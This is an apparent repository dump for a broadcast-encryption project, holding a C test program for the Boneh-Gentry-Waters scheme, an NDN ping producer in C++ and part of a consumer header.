points[(c_y, c_x)] != \"T\" and points[(c_y,c_x)] != \"+\" and points[(c_y,c_x)] != \"S\": \n if points[(c_y, c_x)] == \"|\" and ( 
move_direction == \"E\" or move_direction == \"W\"): \n points[(c_y,c_x)] = \"+\"\n elif points[(c_y, c_x)] == \"-\" and ( move_direction == \"S\" or move_direction == \"N\"): \n points[(c_y,c_x)] = \"+\"\n elif move_direction == \"N\" or move_direction == \"S\":\n points[(c_y,c_x)] = \"|\"\n elif move_direction == \"E\" or move_direction == \"W\":\n points[(c_y,c_x)] = \"-\"\n # A base case to stop overwriting the location of the start_x\n if track.size() == 0:\n advance(move_direction, new_character = \"S\")\n else:\n advance(move_direction)\n window.refresh()\n # revert back to the given position\n window.move(y,x)\n window.refresh()\n\n\ndef opposite_direction(direction):\n \"\"\" Return the opposite_direction of motion.\n Pre: A single character indicating the direction of motions\n post: A single character indicating the opposite_direction of motion\"\"\"\n if direction == \"N\":\n return \"S\"\n if direction == \"S\":\n return \"N\"\n if direction == \"E\":\n return \"W\"\n if direction == \"W\":\n return \"E\"\n\ndef find_open_spaces( flipped_direction):\n \"\"\" Find all the open spaces areound an spot\n pre: The binker must be moved to an spot on the screen\n post a list of all the open spaces on the map.\n \"\"\"\n\n # Store the current spot\n y,x = window.getyx()\n window.move(y,x)\n window.refresh()\n\n # store the spots at all the other points\n north = points[(y - 1, x)]\n south = points[(y + 1, x)]\n east = points[(y, x + 1)]\n west = points[(y, x - 1)]\n open_spaces = list()\n\n #Check to see if the space is empty\n if north != \"W\":\n open_spaces.append(\"N\")\n if south != \"W\":\n open_spaces.append(\"S\")\n if east != \"W\" :\n open_spaces.append(\"E\")\n if west != \"W\" :\n open_spaces.append(\"W\")\n\n return open_spaces\n\n\ndef advance(direction, new_character = 'M'):\n \"\"\" Advances a character on space forward in a given direction\n Pre: A direction to move and an empty space in that direciton\n Post: The cursor will move to that new space\"\"\"\n\n # Get the current_space\n y,x = window.getyx()\n previous_character = points[(y,x)]\n\n # Clean up the current space\n window.addch(y,x,previous_character)\n window.refresh()\n\n # Get the direciton of motions\n if direction == \"N\":\n y -= 1\n elif direction == \"S\":\n y += 1\n elif direction == \"E\":\n x += 1\n elif direction == \"W\":\n x -= 1\n\n # Advances forward\n previous_character = window.inch(y,x)\n previous_character = chr(previous_character)\n window.addch(y,x,new_character)\n\n # Update the screen\n window.move(y,x)\n window.refresh()\n return previous_character\nmain()\n" }, { "alpha_fraction": 0.5581506490707397, "alphanum_fraction": 0.5581506490707397, "avg_line_length": 32.82258224487305, "blob_id": "2827d1f36740918f98d0eecd5d8adc34f339726b", "content_id": "fe4d7454299812d6c2bc0222921c8aa3147100b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2098, "license_type": "no_license", "max_line_length": 82, "num_lines": 62, "path": "/CSC 236 - Software Design/Backtracking/sotoventura-csc236L02/backtracking.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nfrom Stack import Stack\nclass Backtrack(Stack):\n\n \"\"\" Create a class to keep track of the steps taken\"\"\"\n\n class Step(object):\n \"\"\" Create a class to keep track of the steps taken\"\"\"\n \"\"\" Pre: All the open spaces and the direciton the step was taken in\n Post: the object is created\"\"\"\n def 
__init__(self, open_spaces, retract):\n self.open_spaces = open_spaces\n self.retract = retract\n\n def get_open_spaces(self):\n \"\"\" Returns all the open spaces avaliable to a space\n Pre: None\n Post: A list of open spaces is returned\"\"\"\n return self.open_spaces;\n\n def get_retract(self):\n \"\"\" Gets the retract of a step\n Pre: None\n Post: The step taken to get here is listsed.\"\"\"\n return self.retract\n\n def set_open_spaces(self, open_spaces):\n \"\"\" Sets all the open space\n Pre: A list of openspaces\n Post: None\"\"\"\n self.open_spaces = open_spaces\n\n def get_open_spaces(self):\n \"\"\" Returns all the open spaces avaliable to a space\n Pre: None\n Post: A list of open spaces is returned\"\"\"\n\n step = self.top()\n return step.open_spaces\n\n def add_step(self, open_spaces, retract):\n \"\"\" Add a step to the stack\n Pre: the open spaces for the space, retract the direciton of motion\"\"\"\n \"\"\"Post: A step is added to the stack\"\"\"\n next_step = self.Step(open_spaces, retract)\n self.push(next_step)\n\n def get_retract(self):\n \"\"\" Gets the retract of a step\n Pre: None\n Post: The step taken to get here is listsed.\"\"\"\n step = self.top()\n return step.get_retract()\n\n def get_copy(self):\n \"\"\" Creates a copy of the backtrack class\n Pre: A track object\n post: A track obejct's copy is returned\"\"\"\n copy = Backtrack()\n for item in self.items:\n copy.push(item)\n return copy\n\n" }, { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.6326530575752258, "avg_line_length": 15.333333015441895, "blob_id": "9aa746efb48c0ca7e947561634c81946ccbb108d", "content_id": "5d9851848b086203bbe5d17b86379a6b077975fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/CSC 420 - Programming Languages/Racket/test.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "def test(number):\n return number += 2\ntest(2)\n" }, { "alpha_fraction": 0.5887850522994995, "alphanum_fraction": 0.6168224215507507, "avg_line_length": 16.83333396911621, "blob_id": "614cb39de78e4893da6fd43e72a59bafdb72b232", "content_id": "e7d222d1f40bd77f84f378979f3d8e9ad9ce925f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 107, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ex2.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int cookies = 10;\n printf(\"I have %d cookies\\n\", cookies);\n return 0;\n}\n" }, { "alpha_fraction": 0.5823969841003418, "alphanum_fraction": 0.5992509126663208, "avg_line_length": 25.649999618530273, "blob_id": "5f9429f6ac9461b803a589e5cb2bfc16563d4f6d", "content_id": "693a7994d8b6152a718e15054c3b9fe168ff7a52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/CSC 486 - Parallel and Distributed Systems/hello_world.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from mpi4py import MPI\n\ndef hello_world(rank, size):\n print(\"Hello World from Process {0} out of {1}\").format(rank, size)\n\ndef conditional_hello(rank):\n if(rank % 2):\n print(\"Hello from process {0}\").format(rank)\n else:\n print(\"Goodbye 
from process {0}\").format(rank)\n\ndef main():\n rank = MPI.COMM_WORLD.Get_rank()\n size = MPI.COMM_WORLD.Get_size()\n\n print(\"---- Exercise 1 ---\")\n hello_world(rank,size)\n print(\"==== Exercise 2 ===\")\n conditional_hello(rank)\n print(\"---- Exercise 3 ---\")\n\n" }, { "alpha_fraction": 0.5486725568771362, "alphanum_fraction": 0.5575221180915833, "avg_line_length": 15, "blob_id": "c362c09098bfc9075a1769ab5181fefbe53e8d08", "content_id": "9fa44518ff1c0933d175d0e6531253f6e31cd7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 113, "license_type": "no_license", "max_line_length": 22, "num_lines": 7, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ex1.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n printf(\"Jesson\\n\");\n printf(\"Soto Ventura\\n\");\n printf(\"[email protected]\\n\");\n return 0;\n}\n\n" } ]
47
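The Berea-College row above pairs a curses maze walker with a Stack-backed `Backtrack` class: each step records the open spaces seen and the direction taken, and popping the stack is the "retract" out of a dead end. A minimal sketch of the same stack-driven backtracking idea with curses stripped out; the grid, start `S`, and goal `G` below are illustrative, not taken from the repo:

```python
# Stack-based backtracking over a grid maze ('W' = wall, 'S' = start, 'G' = goal).
MAZE = [
    "WWWWW",
    "W..GW",
    "W.WWW",
    "WS..W",
    "WWWWW",
]

def solve(maze):
    start = next((r, c) for r, row in enumerate(maze)
                 for c, ch in enumerate(row) if ch == "S")
    stack = [start]                    # the path walked so far (the "track")
    visited = {start}
    while stack:
        r, c = stack[-1]
        if maze[r][c] == "G":
            return stack               # sequence of cells from S to G
        # step into the first unvisited open neighbour
        for nr, nc in ((r - 1, c), (r + 1, c), (r, c + 1), (r, c - 1)):
            if maze[nr][nc] != "W" and (nr, nc) not in visited:
                visited.add((nr, nc))
                stack.append((nr, nc))
                break
        else:
            stack.pop()                # dead end: retract the last step

print(solve(MAZE))                     # [(3, 1), (2, 1), (1, 1), (1, 2), (1, 3)]
```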
jeffrey-hsi/broadcast-encryption
https://github.com/jeffrey-hsi/broadcast-encryption
5114491b7dda8d09f93066f4bcc6d76ac47ded4d
f62705d2fcf4c0e61895015fab6c4e6c419252a9
a7540499ecfd7dc484aa615157045b9100121032
refs/heads/master
2021-05-02T03:18:15.469295
2017-10-26T06:46:35
2017-10-26T06:46:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5499067306518555, "alphanum_fraction": 0.5834888219833374, "avg_line_length": 26.921823501586914, "blob_id": "13f101b0802fdcf09ac3107a56eb724ef7b8d04f", "content_id": "bf7cd60e7eae29609fcdd5928e4d67758f0c3db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8576, "license_type": "no_license", "max_line_length": 81, "num_lines": 307, "path": "/tests/testbce.c", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* Implementation of Boneh-Gentry-Waters broadcast encryption scheme\n Code by: Matt Steiner [email protected]\n testbce.c\n*/\n\n#include <string.h>\n#include \"pbc_bce.h\"\n\n#define N 64\n#define N_DIV_EIGHT N/8\n\n\nint main(void)\n{\n int i;\n\n global_broadcast_params_t gbs;\n\n //Global Setup\n Setup_global_broadcast_params(&gbs, N, \"d201.param\");\n\n if(DEBUG) {\n printf(\"\\ng = \");\n element_out_str(stdout, 0, gbs->g);\n printf(\"\\nh = \");\n element_out_str(stdout, 0, gbs->h);\n for(i = 0; i < 1; i++) {\n printf(\"\\nThe next element is %d------------------------------------\",i);\n printf(\"\\ngs[%d] = \", i);\n element_out_str(stdout, 0, gbs->gs[i]);\n printf(\"\\nhs[%d] = \",i);\n element_out_str(stdout, 0, gbs->hs[i]);\n }\n printf(\"\\n\");\n }\n\n //Broadcast System Setup\n broadcast_system_t sys;\n Gen_broadcast_system(gbs, &sys);\n\n struct single_priv_key_s mykey;\n struct single_priv_key_s mykey2;\n struct single_priv_key_s mykey3;\n\n Get_priv_key(gbs, sys, 2, &mykey);\n //if(DEBUG) printf(\"done 1\\n\");\n //if(DEBUG) printf(\"done 2\\n\");\n Get_priv_key(gbs, sys, 2, &mykey3);\n //if(DEBUG) printf(\"done 3\\n\");\n\n if(DEBUG) {\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey.g_i_gamma);\n printf(\"\\n\");\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey2.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey2.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey2.g_i_gamma);\n printf(\"\\n\");\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey3.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey3.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey3.g_i_gamma);\n printf(\"\\n\");\n }\n\n char recip[N_DIV_EIGHT];\n for(i = 0; i < 2; i++) recip[i] = 254;\n for(i = 2; i < N_DIV_EIGHT; i++) recip[i] = 0;\n\n Gen_encr_prod_from_bitvec(gbs, sys, recip);\n //Product_Is_Right(gbs, sys, recip);\n //TESTING FOR SYSTEM LOAD AND STORE\n global_broadcast_params_t gbp2;\n broadcast_system_t sys2;\n global_broadcast_params_t gbp3;\n broadcast_system_t sys3;\n\n StoreParams(\"system.stor\", gbs, sys);\n //printf(\"\\ndone storing!!!!!!!!!\\n\\n\");\n LoadParams(\"system.stor\", &gbp2, &sys2);\n LoadParams(\"system.stor\", &gbp3, &sys3);\n\n //printf(\"\\ndone loading!!!!!!!!!\\n\\n\");\n //StoreParams(\"system2.stor\", \"pairing2.stor\", gbp2, sys2);\n //LoadParams(\"system2.stor\", \"pairing2.stor\", &gbs, &sys);\n\n Get_priv_key(gbs, sys, 2, &mykey2);\n\n if(DEBUG) {\n printf(\"\\noldg = \");\n element_out_str(stdout, 0, gbs->g);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->g);\n printf(\"\\noldh = \");\n element_out_str(stdout, 0, gbs->h);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->h);\n printf(\"\\noldgs = \");\n element_out_str(stdout, 0, gbs->gs[0]);\n printf(\"\\nnew = \");\n 
element_out_str(stdout, 0, gbp2->gs[0]);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, gbs->gs[31]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->gs[31]);\n printf(\"\\noldhs = \");\n element_out_str(stdout, 0, gbs->hs[0]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->hs[0]);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, gbs->hs[31]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->hs[31]);\n printf(\"\\n old n_u = %d\", gbs->num_users);\n printf(\"\\n new n_u = %d\", gbp2->num_users);\n printf(\"\\nolde = \");\n element_out_str(stdout, 0, sys->encr_prod);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\noldp = \");\n element_out_str(stdout, 0, sys->pub_key);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, sys2->pub_key);\n }\n\n\n //int in_recip[5] = {4, 5, 6, 7, 8 };\n //int num_recip = 5;\n //int rems[3] = { 5, 6, 7 };\n //int N_rems = 3;\n //int adds[12] = { 2, 3, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16 };\n //int N_adds = 12;\n // FINAL ELEMENTS IN PRODUCT SHOULD BE 2-8, & 10-16\n\n /*\n Gen_encr_prod_from_indicies(gbs, sys2, in_recip, num_recip);\n\n if(DEBUG) {\n PrintBitString(sys2->recipients,BSL);\n printf(\"\\nsys2 encr_product = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\n\");\n }\n\n Change_encr_prod_indicies(gbs, sys2, adds, N_adds, rems, N_rems);\n if(DEBUG) {\n PrintBitString(sys2->recipients,BSL);\n printf(\"\\nsys2 encr_product = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\n\");\n }\n\n\n if(DEBUG) {\n PrintBitString(sys->recipients,BSL);\n printf(\"\\nsys1 encr_product = \");\n element_out_str(stdout, 0, sys->encr_prod);\n }\n */\n\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey);\n //if(DEBUG) printf(\"\\ndone 1 decr\\n\");\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey2);\n //if(DEBUG) printf(\"\\ndone 2 decr\\n\");\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey3);\n //if(DEBUG) printf(\"\\ndone 3 decr\\n\");\n //Gen_decr_prod_from_indicies(gbs, 2, in_recip, num_recip, &mykey2);\n //Change_decr_prod_indicies(gbs, 2, adds, N_adds, rems, N_rems, &mykey2);\n\n //Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey3);\n\n\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey1 decr_product = \");\n element_out_str(stdout, 0, mykey.decr_prod);\n printf(\"\\n\");\n }\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey2 decr_product = \");\n element_out_str(stdout, 0, mykey2.decr_prod);\n printf(\"\\n\");\n }\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey3 decr_product = \");\n element_out_str(stdout, 0, mykey3.decr_prod);\n printf(\"\\n\");\n }\n\n\n\n\n //TESTING FOR SINGLE KEY LOAD AND STORE\n priv_key_t load_key = (priv_key_t)pbc_malloc(sizeof(struct single_priv_key_s));\n\n StorePrivKey(\"key2.stor\", &mykey);\n LoadPrivKey(\"key2.stor\", &load_key, gbs);\n\n if(DEBUG) {\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.g_i_gamma);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->g_i_gamma);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.g_i);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->g_i);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.h_i);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->h_i);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.decr_prod);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->decr_prod);\n printf(\"\\n index = %d\", mykey.index);\n printf(\"\\n index = %d\", load_key->index);\n }\n\n ct_t myCT 
= (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n ct_t myCT2 = (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n ct_t myCT3 = (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n //int recip2[14] = { 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 16 };\n //int n_recip2 = 14;\n element_t key1;\n element_t key2;\n element_t key3;\n element_t key4;\n element_t key5;\n element_t key6;\n\n BroadcastKEM_using_product(gbs, sys, myCT, key1);\n DecryptKEM_using_product(gbs, &mykey, key4, myCT);\n BroadcastKEM_using_product(gbs, sys, myCT3, key3);\n DecryptKEM_using_product(gbp3, &mykey3, key6, myCT3);\n BroadcastKEM_using_product(gbs, sys, myCT2, key2);\n DecryptKEM_using_product(gbp2, &mykey2, key5, myCT2);\n\n\n //BroadcastKEM_using_bitvec(gbs, sys, recip, myCT2, key2);\n //BroadcastKEM_using_indicies(gbs, sys, myCT3, recip2, n_recip2, key3);\n\n\n if(DEBUG) {\n //COMPARE ALL THREE CTs!\n printf(\"\\n1-C0 = \");\n element_out_str(stdout, 0, myCT->C0);\n printf(\"\\n2-C0 = \");\n element_out_str(stdout, 0, myCT2->C0);\n printf(\"\\n3-C0 = \");\n element_out_str(stdout, 0, myCT3->C0);\n printf(\"\\n1-C1 = \");\n element_out_str(stdout, 0, myCT->C1);\n printf(\"\\n2-C1 = \");\n element_out_str(stdout, 0, myCT2->C1);\n printf(\"\\n3-C1 = \");\n element_out_str(stdout, 0, myCT3->C1);\n }\n\n\n printf(\"\\nkey1 = \");\n element_out_str(stdout, 0, key1);\n printf(\"\\n\");\n printf(\"\\nkey2 = \");\n element_out_str(stdout, 0, key2);\n printf(\"\\n\");\n printf(\"\\nkey3 = \");\n element_out_str(stdout, 0, key3);\n printf(\"\\n\");\n\n //PrintBitString(mykey.recipients, BSL);\n //DecryptKEM_using_product(gbs, &mykey2, key5, myCT2);\n\n\n //printf(\"\\nmyprivkey = \");\n //element_out_str(stdout, 0, mykey.g_i_gamma);\n //printf(\"\\n\");\n printf(\"\\nkey1 = \");\n element_out_str(stdout, 0, key4);\n printf(\"\\n\");\n printf(\"\\nkey2 = \");\n element_out_str(stdout, 0, key5);\n printf(\"\\n\");\n printf(\"\\nkey3 = \");\n element_out_str(stdout, 0, key6);\n printf(\"\\n\");\n\n FreeCT(myCT);\n FreeBCS(sys);\n FreeGBP(gbs);\n FreeGBP(gbp2);\n FreeBCS(sys2);\n FreePK(&mykey);\n return 0;\n\n}\n\n\n\n\n" }, { "alpha_fraction": 0.6314091682434082, "alphanum_fraction": 0.6361629962921143, "avg_line_length": 26.523365020751953, "blob_id": "ae0549f6c8a4ba30a4852895b1e1bf51a7012ba4", "content_id": "dc69419e6b3661b0e5df8e2409b3b5e010164301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5890, "license_type": "no_license", "max_line_length": 101, "num_lines": 214, "path": "/example/producer.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. 
See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author Eric Newberry <[email protected]>\n * @author Jerald Paul Abraham <[email protected]>\n */\n\n#include \"ndn-producer-bce.hpp\"\n#include \"tracer.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace server {\n\nclass Runner : noncopyable\n{\npublic:\n explicit\n Runner(const Options& options)\n : m_options(options)\n , m_pingServer(m_face, m_keyChain, options)\n , m_tracer(m_pingServer, options)\n , m_signalSetInt(m_face.getIoService(), SIGINT)\n {\n m_signalSetInt.async_wait(bind(&Runner::afterIntSignal, this, _1));\n\n m_pingServer.afterFinish.connect([this] {\n this->cancel();\n });\n }\n\n int\n run()\n {\n try {\n m_pingServer.start();\n m_face.processEvents();\n }\n catch (std::exception& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n return 1;\n }\n\n std::cout << \"\\n--- ping server \" << m_options.prefix << \" ---\" << std::endl;\n std::cout << m_pingServer.getNPings() << \" packets processed\" << std::endl;\n\n return 0;\n }\n\nprivate:\n void\n cancel()\n {\n m_signalSetInt.cancel();\n m_pingServer.stop();\n }\n\n void\n afterIntSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n cancel();\n }\n\nprivate:\n const Options& m_options;\n Face m_face;\n KeyChain m_keyChain;\n PingServer m_pingServer;\n Tracer m_tracer;\n\n boost::asio::signal_set m_signalSetInt;\n};\n\nstatic time::milliseconds\ngetMinimumFreshnessPeriod()\n{\n return time::milliseconds(1000);\n}\n\nstatic void\nusage(const boost::program_options::options_description& options)\n{\n std::cout << \"Usage: ndnpingserver [options] ndn:/name/prefix\\n\"\n \"\\n\"\n \"Starts a NDN ping server that responds to Interests under name \"\n \"ndn:/name/prefix/ping.\\n\"\n \"\\n\";\n std::cout << options;\n exit(2);\n}\n\nint\nmain(int argc, char* argv[])\n{\n Options options;\n options.freshnessPeriod = getMinimumFreshnessPeriod();\n options.shouldLimitSatisfied = false;\n options.nMaxPings = 0;\n options.shouldPrintTimestamp = false;\n options.payloadSize = 0;\n\n namespace po = boost::program_options;\n\n po::options_description visibleOptDesc(\"Allowed options\");\n visibleOptDesc.add_options()\n (\"help,h\", \"print this message and exit\")\n (\"version,V\", \"display version and exit\")\n (\"freshness,x\", po::value<int>(),\n (\"set freshness period in milliseconds (minimum \" +\n std::to_string(getMinimumFreshnessPeriod().count()) + \" ms)\").c_str())\n (\"satisfy,p\", po::value<int>(&options.nMaxPings), \"set maximum number of pings to be satisfied\")\n (\"timestamp,t\", \"log timestamp with responses\")\n (\"size,s\", po::value<int>(&options.payloadSize), \"specify size of response payload\")\n ;\n po::options_description hiddenOptDesc(\"Hidden options\");\n hiddenOptDesc.add_options()\n (\"prefix\", po::value<std::string>(), \"prefix to register\")\n ;\n\n po::options_description optDesc(\"Allowed options\");\n optDesc.add(visibleOptDesc).add(hiddenOptDesc);\n\n try {\n po::positional_options_description optPos;\n optPos.add(\"prefix\", -1);\n\n po::variables_map optVm;\n po::store(po::command_line_parser(argc, argv).options(optDesc).positional(optPos).run(), optVm);\n po::notify(optVm);\n\n if (optVm.count(\"help\") > 0) {\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"version\") > 0) 
{\n //std::cout << \"ndnpingserver \" << tools::VERSION << std::endl;\n exit(0);\n }\n\n if (optVm.count(\"prefix\") > 0) {\n options.prefix = Name(optVm[\"prefix\"].as<std::string>());\n }\n else {\n std::cerr << \"ERROR: No prefix specified\" << std::endl;\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"freshness\") > 0) {\n options.freshnessPeriod = time::milliseconds(optVm[\"freshness\"].as<int>());\n\n if (options.freshnessPeriod.count() < getMinimumFreshnessPeriod().count()) {\n std::cerr << \"ERROR: Specified FreshnessPeriod is less than the minimum \"\n << getMinimumFreshnessPeriod() << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"satisfy\") > 0) {\n options.shouldLimitSatisfied = true;\n\n if (options.nMaxPings < 1) {\n std::cerr << \"ERROR: Maximum number of pings to satisfy must be greater than 0\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"timestamp\") > 0) {\n options.shouldPrintTimestamp = true;\n }\n\n if (optVm.count(\"size\") > 0) {\n if (options.payloadSize < 0) {\n std::cerr << \"ERROR: Payload size must be greater than or equal to 0\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n }\n catch (const po::error& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n usage(visibleOptDesc);\n }\n\n std::cout << \"PING SERVER \" << options.prefix << std::endl;\n return Runner(options).run();\n}\n\n} // namespace server\n} // namespace ping\n} // namespace ndn\n\nint\nmain(int argc, char** argv)\n{\n return ndn::ping::server::main(argc, argv);\n}\n" }, { "alpha_fraction": 0.6530120372772217, "alphanum_fraction": 0.6589266061782837, "avg_line_length": 24.646066665649414, "blob_id": "634f61ac9753b27c6a0aeb249d4853780b3c5c71", "content_id": "99f31fb7ad0dc4b413c6c19c841816783fa704f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4565, "license_type": "no_license", "max_line_length": 97, "num_lines": 178, "path": "/src/client/ndn-consumer-bce.hpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015-2016, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. 
If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n * @author: Teng Liang <[email protected]>\n */\n\n#ifndef NDN_BCE_CONSUMER_HPP\n#define NDN_BCE_CONSUMER_HPP\n\n#include \"../common.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\ntypedef time::duration<double, time::milliseconds::period> Rtt;\n\n/**\n * @brief options for ndnping client\n */\nstruct Options\n{\n Name prefix; //!< prefix pinged\n bool shouldAllowStaleData; //!< allow stale Data\n bool shouldGenerateRandomSeq; //!< random ping sequence\n bool shouldPrintTimestamp; //!< print timestamp\n int nPings; //!< number of pings\n time::milliseconds interval; //!< ping interval\n time::milliseconds timeout; //!< timeout threshold\n uint64_t startSeq; //!< start ping sequence number\n name::Component clientIdentifier; //!< client identifier\n};\n\n/**\n * @brief NDN modular ping client\n */\nclass Ping : noncopyable\n{\npublic:\n Ping(Face& face, const Options& options);\n\n /**\n * @brief Signals on the successful return of a Data packet\n *\n * @param seq ping sequence number\n * @param rtt round trip time\n */\n signal::Signal<Ping, uint64_t, Rtt> afterData;\n\n /**\n * @brief Signals on the return of a Nack\n *\n * @param seq ping sequence number\n * @param rtt round trip time\n * @param header the received Network NACK header\n */\n signal::Signal<Ping, uint64_t, Rtt, lp::NackHeader> afterNack;\n\n /**\n * @brief Signals on timeout of a packet\n *\n * @param seq ping sequence number\n */\n signal::Signal<Ping, uint64_t> afterTimeout;\n\n /**\n * @brief Signals when finished pinging\n */\n signal::Signal<Ping> afterFinish;\n\n /**\n * @brief Start sending ping interests\n *\n * @note This method is non-blocking and caller need to call face.processEvents()\n */\n void\n start();\n\n /**\n * @brief Stop sending ping interests\n *\n * This method cancels any future ping interests and does not affect already pending interests.\n *\n * @todo Cancel pending ping interest\n */\n void\n stop();\n\nprivate:\n /**\n * @brief Creates a ping Name from the sequence number\n *\n * @param seq ping sequence number\n */\n Name\n makePingName(uint64_t seq) const;\n\n /**\n * @brief Performs individual ping\n */\n void\n performPing();\n\n /**\n * @brief Called when a Data packet is received in response to a ping\n *\n * @param interest NDN interest\n * @param data returned data\n * @param seq ping sequence number\n * @param sendTime time ping sent\n */\n void\n onData(const Interest& interest,\n const Data& data,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime);\n\n /**\n * @brief Called when a Nack is received in response to a ping\n *\n * @param interest NDN interest\n * @param nack returned nack\n * @param seq ping sequence number\n * @param sendTime time ping sent\n */\n void\n onNack(const Interest& interest,\n const lp::Nack& 